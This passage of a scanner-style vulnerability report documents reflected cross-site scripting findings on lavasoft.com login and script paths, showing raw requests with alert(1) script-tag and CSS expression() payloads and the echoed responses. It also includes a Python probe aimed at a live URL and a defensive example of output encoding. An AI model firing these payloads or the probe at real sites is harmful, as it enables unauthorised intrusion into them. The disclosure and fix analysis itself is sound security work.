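    if kind == "text":
        return "%s<script>alert(1)</script>%s" % (prefix, suffix)
    return None


def probe(url, n, fetch=fake_404_page):
    """Two-stage check: locate a canary, then confirm the matching breakout
    payload is echoed unmodified.  fetch(path) returns a response body."""
    c = canary()
    ctx = reflection_context(fetch(urlsplit(inject_rest_param(url, n, c)).path), c)
    payload = breakout_payload(ctx, canary(5), canary(11))
    if payload is None:
        return ctx, None, False
    echoed = payload in fetch(urlsplit(inject_rest_param(url, n, payload)).path)
    return ctx, payload, echoed


if __name__ == "__main__":
    print(probe("http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png", 1))
```

Because the canary is alphanumeric, it lands in the page even when the application encodes quotes and angle brackets; only the second stage tells a reflection from an exploitable one, which is why the report states separately that the payload "was echoed unmodified".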

1.166. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b048'><script>alert(1)</script>28f692a0d15a4a8ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /mylavasoft2b048'><script>alert(1)</script>28f692a0d15a4a8ea/login?empty=/?domain=4b22e&email=&op=Get+new+password&form_build_id=form-378338bb4a4188f5405b0cba0089b8e9&form_id=lava_user_password_reminder_form HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.2.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:39:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:39:12 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:39:12 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10754
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft2b048'><script>alert(1)</script>28f692a0d15a4a8ea/login?empty=/?domain=4b22e&email=&op=Get+new+password&form_build_id=form-378338bb4a4188f5405b0cba0089b8e9&form_id=lava_user_password_reminder_form'>
...[SNIP]...

1.167. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f69f'><script>alert(1)</script>6a1505323de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft8f69f'><script>alert(1)</script>6a1505323de/login?destination=/?domain=4b22e HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/?domain=4b22e%27%3E%3Cscript%3Eprompt(document.location)%3C/script%3E8a5fb0d26dc
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:38:33 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:38:33 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10634
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft8f69f'><script>alert(1)</script>6a1505323de/login?destination=/?domain=4b22e'>
...[SNIP]...

1.168. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f879'><script>alert(1)</script>e4fcb70e95babf13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /mylavasoft/login5f879'><script>alert(1)</script>e4fcb70e95babf13?empty=/?domain=4b22e&email=&op=Get+new+password&form_build_id=form-378338bb4a4188f5405b0cba0089b8e9&form_id=lava_user_password_reminder_form HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.2.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:39:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:39:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18318
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/login5f879'><script>alert(1)</script>e4fcb70e95babf13'>
...[SNIP]...

1.169. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6354'><script>alert(1)</script>745e8b4b2d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/logine6354'><script>alert(1)</script>745e8b4b2d1?destination=/?domain=4b22e HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/?domain=4b22e%27%3E%3Cscript%3Eprompt(document.location)%3C/script%3E8a5fb0d26dc
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18308
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/logine6354'><script>alert(1)</script>745e8b4b2d1'>
...[SNIP]...

1.170. http://www.lavasoft.com/mylavasoft/login [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks (the value attribute of the login form's hidden destination field). The payload b7b4d'style%3d'x%3aexpression(alert(1))'ca66c4680d2948ae4 was submitted in the destination parameter. This input was echoed as b7b4d'style='x:expression(alert(1))'ca66c4680d2948ae4 in the application's response, that is, with the URL encoding decoded and the single quotes left unencoded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run JavaScript. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and is evaluated only by older versions or in compatibility and quirks modes) and will not work in other browsers. The underlying flaw, an unencoded single quote inside a single-quoted attribute value, is browser-independent and lets an attacker append further attributes to the input element. That the scanner fell back to this attribute-only payload rather than the '><script> breakout used elsewhere in this report suggests that this particular sink encodes angle brackets but not single quotes.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /mylavasoft/login?destination=/?domain=4b22e&name=aTxijkQj38&mail=&pass%5Bpass1%5D=&pass%5Bpass2%5D=&timezone=-18000&form_build_id=form-151e601a49e595348b38fe5eb25431f6&form_id=user_register&captcha_sid=5059850&captcha_token=aab3446acbeb7c70605fb791b29b9f8b&captcha_response=reCAPTCHA&recaptcha_challenge_field=03AHJ_VuvCXJzKID-23Y5ovs8Cr3wiIdWWLcUQc9Wqsy4bo93K58LQoDpc6qnHPgMftcz6iV2bHKhsGh251lY_bj9fYHQzmXEBwNF6SkJKzpQlHnOpxRRrUHQtUTG0ErOJkWIc2k8kXOwKcmdOzkBUOx4Km3WmDL3Pjg&recaptcha_response_field=&op=Create+new+account&destination=%2Fabsolute%2F%2F%3Fdomain%3D4b22eb7b4d'style%3d'x%3aexpression(alert(1))'ca66c4680d2948ae4&ref=%2F%3Fdomain%3D4b22e%2527%253E%253Cscript%253Eprompt%28document.location%29%253C%2Fscript%253E8a5fb0d26dc HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.2.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1; has_js=1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:39:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:39:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 26441
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<input type='hidden' name='destination' value='/absolute//absolute//?domain=4b22eb7b4d'style='x:expression(alert(1))'ca66c4680d2948ae4' />
...[SNIP]...

1.171. http://www.lavasoft.com/mylavasoft/login [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a019'style%3d'x%3aexpression(alert(1))'38cb7c2a7e7 was submitted in the destination parameter. This input was echoed as 4a019'style='x:expression(alert(1))'38cb7c2a7e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run JavaScript. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and is evaluated only by older versions or in compatibility and quirks modes) and will not work in other browsers.

Request

GET /mylavasoft/login?destination=/?domain=4b22e4a019'style%3d'x%3aexpression(alert(1))'38cb7c2a7e7 HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/?domain=4b22e%27%3E%3Cscript%3Eprompt(document.location)%3C/script%3E8a5fb0d26dc
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:38:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 25022
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<input type='hidden' name='destination' value='/absolute//?domain=4b22e4a019'style='x:expression(alert(1))'38cb7c2a7e7' />
...[SNIP]...
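Every finding on this host lands in a single-quoted attribute, and findings 1.170 and 1.171 break out with a bare single quote and no angle brackets at all. The Python below is an added example, not code from lavasoft.com or from the report, that shows why that combination matters. It renders the two sinks visible in the responses (the hidden destination input and the login link's href) through three output encoders, including an emulation of PHP 5.3's htmlspecialchars() default, which leaves the single quote alone, and then asks Python's HTML parser whether the injected value stayed inside its attribute the way a browser would see it. The templates and the assumption that the server uses htmlspecialchars() are illustrative; the payloads are copied from findings 1.171 and 1.167.

```python
import html
import urllib.parse
from html.parser import HTMLParser

# Payloads taken verbatim from findings 1.171 and 1.167 of this report.
STYLE_PAYLOAD = "4b22e4a019'style='x:expression(alert(1))'38cb7c2a7e7"
TAG_PAYLOAD = "/mylavasoft8f69f'><script>alert(1)</script>6a1505323de/login"


# Templates modelled on the two sinks visible in the responses.  They are an
# assumption about server-side code that is not on the page.
def render_hidden_input(value, encode):
    return "<input type='hidden' name='destination' value='%s' />" % encode(value)


def render_login_link(path, encode):
    return "<a class='login first' href='/mylavasoft/login?destination=%s'>" % encode(path)


def identity(s):
    return s


def php_htmlspecialchars_default(s):
    """Emulates PHP 5.3 htmlspecialchars() with its default ENT_COMPAT flag
    (the server advertises PHP/5.3.2): & < > and the double quote are
    encoded, the single quote is not.  PHP 8.1 changed the default."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def html_escape_quotes(s):
    """Encodes both quote characters too; safe inside any quoted attribute."""
    return html.escape(s, quote=True)


def percent_encode(s):
    """The right encoding for a value that is itself a URL query component."""
    return urllib.parse.quote(s, safe="/")


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes as a browser would parse
    them, so we can tell whether the payload escaped its attribute."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def parse_tags(markup):
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def attribute_contained(markup, value):
    """True only if the parse yields exactly one <input> whose value attribute
    round-trips to the original string and which gained no extra attributes."""
    tags = parse_tags(markup)
    if len(tags) != 1:
        return False
    tag, attrs = tags[0]
    return tag == "input" and set(attrs) == {"type", "name", "value"} and attrs["value"] == value


def href_value(markup):
    """The href a browser would follow, or None if the link was broken open."""
    tags = parse_tags(markup)
    if len(tags) != 1 or tags[0][0] != "a" or set(tags[0][1]) != {"class", "href"}:
        return None
    return tags[0][1]["href"]


ENCODERS = {
    "none": identity,
    "htmlspecialchars_default": php_htmlspecialchars_default,
    "html_escape_quotes": html_escape_quotes,
}


def audit(payload):
    """For each encoder: did the hidden input survive the payload intact?"""
    return {name: attribute_contained(render_hidden_input(payload, enc), payload)
            for name, enc in ENCODERS.items()}


if __name__ == "__main__":
    for name, payload in (("style", STYLE_PAYLOAD), ("tag", TAG_PAYLOAD)):
        print(name, audit(payload))
    print(href_value(render_login_link(TAG_PAYLOAD, percent_encode)))
```

The htmlspecialchars_default row fails for both payloads: it stops the `<script>` breakout but still lets the single quote close the attribute, so an attacker can add attributes such as style or an event handler. For the href sink the clean fix is to percent-encode the destination as a query component first and then HTML-encode the whole attribute value, so the value stays inside the attribute and is a well-formed URL.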

1.172. http://www.lavasoft.com/mylavasoft/misc/drupal.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 160d5'><script>alert(1)</script>ce9b102c404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft160d5'><script>alert(1)</script>ce9b102c404/misc/drupal.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10618
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft160d5'><script>alert(1)</script>ce9b102c404/misc/drupal.js?w'>
...[SNIP]...

1.173. http://www.lavasoft.com/mylavasoft/misc/drupal.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a6729'><script>alert(1)</script>398b22b03e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misca6729'><script>alert(1)</script>398b22b03e7/drupal.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18208
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misca6729'><script>alert(1)</script>398b22b03e7/drupal.js'>
...[SNIP]...

1.174. http://www.lavasoft.com/mylavasoft/misc/drupal.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/drupal.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7375'><script>alert(1)</script>8ec033ef7c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misc/drupal.jsd7375'><script>alert(1)</script>8ec033ef7c0?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18170
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misc/drupal.jsd7375'><script>alert(1)</script>8ec033ef7c0'>
...[SNIP]...

1.175. http://www.lavasoft.com/mylavasoft/misc/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea828'><script>alert(1)</script>1d6fa491fe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftea828'><script>alert(1)</script>1d6fa491fe7/misc/jquery.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
